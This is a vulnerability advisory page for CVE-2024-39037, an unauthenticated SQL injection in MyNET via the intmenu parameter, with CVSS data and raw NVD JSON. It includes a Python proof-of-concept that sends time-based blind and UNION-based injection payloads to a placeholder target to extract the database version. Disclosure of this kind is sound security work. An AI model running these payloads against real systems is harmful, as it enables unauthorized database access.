Security Vulnerability Report
中文
CVE-2024-39037 CVSS 6.5 MEDIUM

CVE-2024-39037

Published: 2025-12-24 16:15:47
Last Modified: 2026-01-08 22:05:05

Description

MyNET up to v26.08.316 was discovered to contain an Unauthenticated SQL Injection vulnerability via the intmenu parameter.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:* - VULNERABLE
MyNET < v26.08.316

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2024-39037 SQL Injection PoC # Target: MyNET application # Vulnerability: Unauthenticated SQL Injection via intmenu parameter TARGET_URL = "http://target.com/path/to/myent" # Replace with actual target def exploit_sql_injection(): """ SQL Injection PoC for CVE-2024-39037 This PoC demonstrates extraction of database version information """ # Blind SQL Injection payload to extract database version # Using time-based blind injection technique payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)---" params = { 'intmenu': payload } try: response = requests.get(TARGET_URL, params=params, timeout=10) print(f"[*] Request sent to {TARGET_URL}") print(f"[*] Payload: {payload}") print(f"[*] Status Code: {response.status_code}") # Extract database version using UNION-based injection union_payload = "1' UNION SELECT NULL,@@version,NULL,NULL---" params['intmenu'] = union_payload response = requests.get(TARGET_URL, params=params, timeout=10) print(f"[*] UNION payload sent") return True except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": print("CVE-2024-39037 SQL Injection PoC") print("=" * 50) exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-39037", "sourceIdentifier": "[email protected]", "published": "2025-12-24T16:15:47.280", "lastModified": "2026-01-08T22:05:04.547", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyNET up to v26.08.316 was discovered to contain an Unauthenticated SQL Injection vulnerability via the intmenu parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.08.316", "matchCriteriaId": "EC0F668D-5C50-4434-92D5-67D07954704B"}]}]}], "references": [{"url": "https://miguelsantareno.github.io/airc_exploit.txt", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN", "source": "[email protected]", "tags": ["Product"]}]}}